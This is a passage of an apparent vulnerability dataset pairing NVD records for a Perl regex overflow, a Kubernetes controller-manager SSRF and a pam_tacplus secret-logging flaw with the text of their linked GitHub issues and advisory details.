"versionEndIncluding": "10.4.0.3.1", "versionStartExcluding": null, "versionStartIncluding": "10.4.0.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "495DECD7-B14F-4D59-B3E1-30BF9B267475", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "78C99571-0F3C-43E6-84B3-7D80E045EF8E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "77E39D5C-5EFA-4FEB-909E-0A92004F2563", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:9.1:*:*:*:*:*:*:*", "matchCriteriaId": "06816711-7C49-47B9-A9D7-FB18CC3F42F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:tekelec_platform_distribution:*:*:*:*:*:*:*:*", "matchCriteriaId": "26F05F85-7458-4C8F-B93F-93C92E506A40", "versionEndExcluding": null, "versionEndIncluding": "7.7.1", "versionStartExcluding": null, "versionStartIncluding": "7.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/Perl/perl5/issues/16947
[ "Third Party Advisory" ]
github.com
[ "Perl", "perl5" ]
Migrated from [rt.perl.org#134017](https://rt-archive.perl.org/perl5/Ticket/Display.html?id=134017) (status was 'open') Searchable as RT134017$
Segfault in S_study_chunk (regcomp.c:4870)
https://api.github.com/repos/Perl/perl5/issues/16947/comments
28
2019-04-10T13:09:22Z
2020-04-23T12:40:12Z
https://github.com/Perl/perl5/issues/16947
509,396,691
16,947
1,258
CVE-2020-12723
2020-06-05T15:15:10.800
regcomp.c in Perl before 5.30.3 allows a buffer overflow via a crafted regular expression because of recursive S_study_chunk calls.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00044.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/blob/blead/pod/perl5303delta.pod" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/compare/v5.30.2...v5.30.3" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/16947" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/17743" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/perl/perl5/commit/66bbb51b93253a3f87d11c2695cfb7bdb782184a" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IN3TTBO5KSGWE5IRIKDJ5JSQRH7ANNXE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-03" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200611-0001/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00044.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/blob/blead/pod/perl5303delta.pod" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/compare/v5.30.2...v5.30.3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/16947" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Perl/perl5/issues/17743" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/perl/perl5/commit/66bbb51b93253a3f87d11c2695cfb7bdb782184a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IN3TTBO5KSGWE5IRIKDJ5JSQRH7ANNXE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202006-03" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200611-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:perl:perl:*:*:*:*:*:*:*:*", "matchCriteriaId": "C171B203-3DAA-43B7-A0BE-DDB0895EB744", "versionEndExcluding": "5.30.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "2ECD5E79-5C1B-42E9-BE0B-A034EE2D632D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "E39D442D-1997-49AF-8B02-5640BE2A26CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "C88D46AF-459D-4917-9403-0F63FEC83512", "versionEndExcluding": null, "versionEndIncluding": "8.5.0", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:*", "matchCriteriaId": "1A0E3537-CB5A-40BF-B42C-CED9211B8892", "versionEndExcluding": null, "versionEndIncluding": "16.4.0", "versionStartExcluding": null, "versionStartIncluding": "16.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_eagle_lnp_application_processor:10.1:*:*:*:*:*:*:*", "matchCriteriaId": "996861FC-0089-4BED-8E46-F2B76037EA65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_eagle_lnp_application_processor:10.2:*:*:*:*:*:*:*", "matchCriteriaId": "37764AF5-E42E-461E-AA43-763D21B3DCE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_lsms:*:*:*:*:*:*:*:*", "matchCriteriaId": "806AF4AF-12FB-4222-84E4-BC9D44EFF09F", "versionEndExcluding": null, "versionEndIncluding": "13.4", "versionStartExcluding": null, "versionStartIncluding": "13.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "49ACFC73-A509-4D1C-8FC3-F68F495AB055", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_performance_intelligence_center:*:*:*:*:*:*:*:*", "matchCriteriaId": "977CA754-6CE0-4FCB-9683-D81B7A15449D", "versionEndExcluding": null, "versionEndIncluding": "10.3.0.2.1", "versionStartExcluding": null, "versionStartIncluding": "10.3.0.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_performance_intelligence_center:*:*:*:*:*:*:*:*", "matchCriteriaId": "29A3F7EF-2A69-427F-9F75-DDDBEE34BA2B", "versionEndExcluding": null, "versionEndIncluding": "10.4.0.3.1", "versionStartExcluding": null, "versionStartIncluding": "10.4.0.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "495DECD7-B14F-4D59-B3E1-30BF9B267475", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "78C99571-0F3C-43E6-84B3-7D80E045EF8E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "77E39D5C-5EFA-4FEB-909E-0A92004F2563", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:9.1:*:*:*:*:*:*:*", "matchCriteriaId": "06816711-7C49-47B9-A9D7-FB18CC3F42F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:tekelec_platform_distribution:*:*:*:*:*:*:*:*", "matchCriteriaId": "26F05F85-7458-4C8F-B93F-93C92E506A40", "versionEndExcluding": null, "versionEndIncluding": "7.7.1", "versionStartExcluding": null, "versionStartIncluding": "7.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/Perl/perl5/issues/17743
[ "Third Party Advisory" ]
github.com
[ "Perl", "perl5" ]
This is a placeholder ticket for consideration of a theoretically possible bug. In #16947 we found that study_chunk reinvokes itself in two ways - by simple recursion, and by enframing. In some cases that involves restudying regexp ops multiple times, whereas in other cases the reinvocation is the only time the relevant ops are studied. The primary results of studying are a) to capture global information about the regexp that will be used for optimization at runtime; b) to make in-place modifications to the ops for optimization (optional but desirable); and c) to make mandatory modifications to the ops, replacing temporary compile-time-only ops that the runtime engine does not know how to handle. Because of (c) it is required that every op is studied at least once. When ops are studied multiple times that can cause problems: the first invocation may capture information about the program, then reinvoke, then attempt to use the captured information assuming it has not changed. The conclusion is that mutation of ops must happen only once, at the outermost level of reinvocation that will act on the relevant ops. As far as I was able to discover the only case in which ops are studied multiple times is in the handling of GOSUB, which reinvokes by enframing. In #16947 this was resolved by recording in each frame whether it, or any outer frame, represented the handling of a GOSUB, and suppressing all mutating changes if so (confident that the same ops will be studied at some point in some outer frame that is not within the handling of a GOSUB). When we reinvoke by recursion, however, any frames used by the caller are not visible to the callee; as such it may still be possible to trigger the same types of problem if reinvocation involves a mix of enframing and recursion. Extending the fix from 089ad25d3f to handle this case would involve adding an extra boolean argument `was_mutate_ok` to study_chunk. All principal calls would pass this in as 0; all recursive calls would pass in the local value of `mutate_ok`; and the setting of `mutate_ok` would change to: ``` bool mutate_ok = (was_mutate_ok && (!frame || !frame->in_gosub)); ``` I don't intend to make such a change unless we find a testcase to show this is a real rather than a theoretical problem.
study_chunk recursion
https://api.github.com/repos/Perl/perl5/issues/17743/comments
1
2020-04-23T13:10:14Z
2020-09-15T15:28:27Z
https://github.com/Perl/perl5/issues/17743
605,518,922
17,743
1,259
CVE-2020-8555
2020-06-05T17:15:11.640
The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2020/06/01/4" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/05/04/8" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/91542" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/d/topic/kubernetes-security-announce/kEK27tqqs30/discussion" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0005/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2020/06/01/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/05/04/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/91542" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/d/topic/kubernetes-security-announce/kEK27tqqs30/discussion" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0005/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "1BB84B14-8D71-4BEA-90FC-DB76F9A0F781", "versionEndExcluding": "1.15.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "111CE2DC-82F8-4AF6-99B6-5BB847A18D95", "versionEndExcluding": "1.16.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9D5D5658-D416-434A-BA64-74DA2A4F13E2", "versionEndExcluding": "1.17.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.18.0:-:*:*:*:*:*:*", "matchCriteriaId": "AF65B08E-28BD-496F-88AE-CB7271BD7379", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/kubernetes/kubernetes/issues/91542
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N) There exists a Server Side Request Forgery (SSRF) vulnerability in kube-controller-manager that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services). An attacker with permissions to create a pod with certain built-in Volume types (GlusterFS, Quobyte, StorageOS, ScaleIO) or permissions to create a StorageClass can cause kube-controller-manager to make GET requests or POST requests without an attacker controlled request body from the master's host network. ### Am I vulnerable? You may be vulnerable if: - You are running a vulnerable version (see below) - There are unprotected endpoints normally only visible from the Kubernetes master (including link-local metadata endpoints, unauthenticated services listening on localhost, or other services in the master's private network) - Untrusted users can create pods with an affected volume type or modify storage classes. #### Affected Versions - kube-controller-manager v1.18.0 - kube-controller-manager v1.17.0 - v1.17.4 - kube-controller-manager v1.16.0 - v1.16.8 - kube-controller-manager <= v1.15.11 The affected volume types are: GlusterFS, Quobyte, StorageOS, ScaleIO ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by adding endpoint protections on the master or restricting usage of the vulnerable volume types (for example by constraining usage with a [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems) or third-party admission controller such as [Gatekeeper](https://github.com/open-policy-agent/gatekeeper)) and restricting StorageClass write permissions through RBAC. #### Fixed Versions The information leak was patched in the following versions: - kube-controller-manager master - fixed by https://github.com/kubernetes/kubernetes/pull/89794 - kube-controller-manager v1.18.1+ - fixed by https://github.com/kubernetes/kubernetes/pull/89796 - kube-controller-manager v1.17.5+ - fixed by https://github.com/kubernetes/kubernetes/pull/89837 - kube-controller-manager v1.16.9+ - fixed by https://github.com/kubernetes/kubernetes/pull/89838 - kube-controller-manager v1.15.12+ - fixed by https://github.com/kubernetes/kubernetes/pull/89839 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ## Additional Details Exploitation of this vulnerability causes the kube-controller-manager to make a request to a user-supplied, unvalidated URL. The request does not include any kube-controller-manager client credentials. #### Acknowledgements This vulnerability was reported by Brice Augras from Groupe-Asten and Christophe Hauquiert from Nokia. /area security /kind bug /committee product-security /sig storage /area controller-manager
CVE-2020-8555: Half-Blind SSRF in kube-controller-manager
https://api.github.com/repos/kubernetes/kubernetes/issues/91542/comments
4
2020-05-28T16:13:34Z
2021-12-02T22:54:48Z
https://github.com/kubernetes/kubernetes/issues/91542
626,636,248
91,542
1,260
CVE-2020-13881
2020-06-06T19:15:09.610
In support.c in pam_tacplus 1.3.8 through 1.5.1, the TACACS+ shared secret gets logged via syslog if the DEBUG loglevel and journald are used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2020/06/08/1" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kravietz/pam_tacplus/commit/4a9852c31c2fd0c0e72fbb689a586aabcfb11cb0" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kravietz/pam_tacplus/issues/149" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00007.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00006.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4521-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/11705-security-advisory-50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2020/06/08/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kravietz/pam_tacplus/commit/4a9852c31c2fd0c0e72fbb689a586aabcfb11cb0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kravietz/pam_tacplus/issues/149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4521-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/11705-security-advisory-50" } ]
